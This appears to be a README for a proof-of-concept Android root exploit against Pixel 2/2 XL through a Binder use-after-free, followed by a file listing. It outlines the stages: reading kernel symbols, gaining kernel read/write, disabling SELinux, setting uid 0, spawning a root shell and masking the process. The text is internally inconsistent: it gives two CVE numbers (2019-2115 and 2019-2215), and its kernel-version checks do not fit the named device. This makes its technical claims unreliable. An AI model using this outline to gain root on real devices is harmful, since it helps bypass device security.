CVE-2019-2115 "test"# CVE-2019-2115-Pixel-2-2-XL
Translation to English
This script is an exploit targeting Google Pixel 2 and Pixel 2 XL via the CVE-2019-2215 vulnerability, which allows privilege escalation by gaining read/write access to the Linux kernel. It exploits a flaw in the Binder subsystem to obtain root privileges on the device.
1. Script Objective
Identify the Linux kernel version in use.
Exploit the vulnerability to gain read/write access to kernel memory.
Temporarily disable security mechanisms (such as SELinux).
Elevate process privileges by modifying its credentials in the kernel.
Launch a root shell or activate debug mode.
Clean up traces of exploitation by restoring protections.
2. Detailed Explanation of the Script
2.1 Inclusion of Libraries
The script includes several system libraries for kernel manipulation and exploitation:
fcntl.h, unistd.h, sys/ioctl.h → File management and system calls
sys/mman.h → Memory management
sys/epoll.h → Event handling
sys/prctl.h → Process attribute modification (e.g., hiding its name)
sys/socket.h → Socket management for kernel exploitation
sys/utsname.h → Kernel information retrieval
2.2 Definition of Types and Global Variables
The script uses global variables to store kernel symbol addresses:
ksym_init_task, ksym_init_user_ns, ksym_selinux_enabled, ksym_selinux_enforcing
kernel_rw_pipe[2]: Pipe used for kernel space communication
dummy_page: A memory page used for exploitation
binder_fd, epoll_fd: File descriptors for interacting with Binder and Epoll
2.3 Kernel Symbol Resolution (resolve_symbol())
Reads /proc/kallsyms to retrieve addresses of symbols required for exploitation.
Uses sscanf() to extract symbol addresses such as init_task (used to locate the current process).
2.4 Kernel Version Detection
uname(&kernel_info) retrieves the kernel version.
Checks if the kernel is 5.4 or 4.19 to adjust offsets used in the exploit.
2.5 Kernel Memory Read/Write (kread() and kwrite())
Uses the kernel_rw_pipe to perform read() and write() operations on kernel memory.
kread() extracts values from kernel memory.
kwrite() writes arbitrary values to kernel memory.
kwrite_u32() specifically writes a 32-bit value to kernel memory.
2.6 Exploitation and Privilege Escalation
The script follows multiple stages via execute_stage():
1. prepare_globals()
Retrieves addresses of critical symbols.
Allocates a memory page with mmap().
Creates a pipe for kernel communication.
Opens /dev/binder to interact with Binder.
2. find_current()
Identifies the current process by locating its task_struct.
3. obtain_kernel_rw()
Exploits CVE-2019-2215 to enable read/write access to kernel memory.
4. find_kernel_base()
Detects the kernel base address to adjust offsets used in the exploit.
5. patch_creds()
Modifies the process credentials to gain root privileges (uid = 0).
6. launch_shell()
Launches a root shell to execute commands with elevated privileges.
7. launch_debug_console() (only if debug mode is enabled)
Provides an interactive session for testing the exploit.
2.7 Cleanup After Exploitation
restore_original_values() re-enables SELinux after modifying its values in kernel memory.
mask_logs_and_process() changes the process name to hide traces (prctl(PR_SET_NAME, "hacker_process")).
execute_cleanup_stage() performs these actions at the end.
3. Security and Impact
3.1 Vulnerability Exploited: CVE-2019-2215
Type: Use-after-free in the Binder subsystem
Effect: Grants arbitrary read/write access to kernel memory
Vulnerable Systems: Android with 4.14, 4.19, and 5.4 kernels
3.2 Consequences of Execution
✅ Temporary root access (temproot), allowing system file modifications.
✅ Bypasses Android security mechanisms such as SELinux.
⚠ Risk of device bricking if mishandled.
⚠ Can be detected by advanced security mechanisms like SafetyNet.
This script is exploit designed to take advantage of CVE-2019-2215 and gain root privileges on Pixel 2/2 XL. It relies on a combination of memory manipulation, SELinux deactivation, and process structure modification.
While such techniques are used for security testing (pentesting), they can also be misused for malicious attacks. Running this code on a non-vulnerable device will not work and may result in a crash or kernel panic.
[4.0K] /data/pocs/97f21570d609b7af5a3111d61866a81b9e20880b
├── [5.0K] CVE-2019-2115
└── [4.2K] README.md
0 directories, 2 files